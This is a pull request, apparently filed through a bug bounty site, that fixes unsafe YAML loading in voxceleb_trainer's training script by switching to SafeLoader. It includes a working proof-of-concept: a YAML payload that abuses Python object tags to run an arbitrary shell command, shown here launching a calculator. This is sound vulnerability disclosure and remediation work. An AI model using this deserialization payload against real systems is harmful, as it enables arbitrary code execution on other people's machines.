### PR TITLE
Arbitary Code Execution Fixed in voxceleb_trainer

### DIFF
--- a/trainSpeakerNet.py
+++ b/trainSpeakerNet.py
@@ -89,7 +89,7 @@ def find_option_type(key, parser):
 
 if args.config is not None:
     with open(args.config, "r") as f:
-        yml_config = yaml.load(f, Loader=yaml.FullLoader)
+        yml_config = yaml.load(f, Loader=yaml.SafeLoader)
     for k, v in yml_config.items():
         if k in args.__dict__:
             typ = find_option_type(k, parser)


### PR DESCRIPTION
### 📊 Metadata *
`voxceleb_trainer` contains the framework for training speaker recognition models described in the paper 'In defence of metric learning for speaker recognition

#### Bounty URL: https://www.huntr.dev/bounties/1-other-voxceleb_trainer

### ⚙️ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

### 💻 Technical Description *

Fixed by avoiding unsafe loader.

### 🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

```
import os
#os.system('git clone https://github.com/clovaai/voxceleb_trainer.git')
os.chdir('voxceleb_trainer/')
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""

open('config.yml','w+').write(payload)
os.system('python3 trainSpeakerNet.py --config config.yml')
```

Execute the commands in another terminal:

```
python3 exploit.py
```

![POC](https://user-images.githubusercontent.com/61599526/108119909-62ceec00-7098-11eb-8b40-f569aef0df4a.png)
xcalc will pop up.

### 🔥 Proof of Fix (PoF) *

![POF](https://user-images.githubusercontent.com/61599526/108119913-64001900-7098-11eb-96b5-c67ab5ffd83a.png)
After fix code execution is restricted

### 👍 User Acceptance Testing (UAT)
After fix functionality is unaffected.

### 🔗 Relates to...
https://www.huntr.dev/bounties/1-other-voxceleb_trainer
